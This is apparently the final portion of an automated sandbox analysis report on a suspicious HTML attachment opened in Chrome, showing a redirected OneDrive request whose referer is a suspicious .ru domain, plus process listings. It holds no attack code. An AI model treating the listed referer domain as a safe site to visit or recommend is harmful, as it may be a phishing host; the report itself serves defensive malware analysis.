                                                                                                                              Host: onedrive.live.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Referer: https://h6n.xswpbsmx.ru/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:34 UTC2227INHTTP/1.1 302 Found
                                                                                                                              Cache-Control: private
                                                                                                                              Content-Length: 186
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Location: https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage
                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                              X-NetworkStatistics: 0,525568,0,100,51832,0,324854,34
                                                                                                                              X-SharePointHealthScore: 3
                                                                                                                              Content-Security-Policy: frame-ancestors 'self' sentry.contentvalidation.com sentry.ppe.contentvalidation.com sentry.int.contentvalidation.com
                                                                                                                              X-AspNet-Version: 4.0.30319
                                                                                                                              X-DataBoundary: NONE
                                                                                                                              X-1DSCollectorUrl: https://mobile.events.data.microsoft.com/OneCollector/1.0/
                                                                                                                              X-AriaCollectorURL: https://browser.pipe.aria.microsoft.com/Collector/3.0/
                                                                                                                              SPRequestGuid: e1576aa1-b01e-7000-1c25-1d07435ea8e0
                                                                                                                              request-id: e1576aa1-b01e-7000-1c25-1d07435ea8e0
                                                                                                                              MS-CV: oWpX4R6wAHAcJR0HQ16o4A.0
                                                                                                                              Alt-Svc: h3=":443";ma=86400
                                                                                                                              Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=00000000-0000-0000-0000-000000000000&destinationEndpoint=Edge-Prod-BN3r2&frontEnd=AFD&RemoteIP=8.46.123.0"}]}
                                                                                                                              NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-FRAME-OPTIONS: SAMEORIGIN
                                                                                                                              Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com teams.cloud.microsoft *.office365.com goals.cloud.microsoft *.powerapps.com app.powerbi.com *.yammer.com engage.cloud.microsoft word.cloud.microsoft excel.cloud.microsoft powerpoint.cloud.microsoft *.officeapps.live.com *.office.com *.microsoft365.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com onedrive.live.com *.onedrive.live.com securebroker.sharepointonline.com;
                                                                                                                              SPRequestDuration: 19
                                                                                                                              SPIisLatency: 4
                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                              MicrosoftSharePointTeamServices: 16.0.0.25506
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-MS-InvokeApp: 1; RequireReadOnly
                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                              X-MSEdge-Ref: Ref A: E9831F79D7DA4418819DB32447BA480C Ref B: BN3EDGE0921 Ref C: 2024-12-04T20:16:34Z
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:33 GMT
                                                                                                                              Connection: close
                                                                                                                              2024-12-04 20:16:34 UTC186INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2d 33 36 35 2f 6f 6e 65 64 72 69 76 65 2f 6f 6e 6c 69 6e 65 2d 63 6c 6f 75 64 2d 73 74 6f 72 61 67 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.microsoft.com/microsoft-365/onedrive/online-cloud-storage">here</a>.</h2></body></html>


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:15:15:44
                                                                                                                              Start date:04/12/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Danellarealty 1052.html"
                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:2
                                                                                                                              Start time:15:15:47
                                                                                                                              Start date:04/12/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1856,i,3809467858696526328,4437196240526535120,262144 /prefetch:8
                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              No disassembly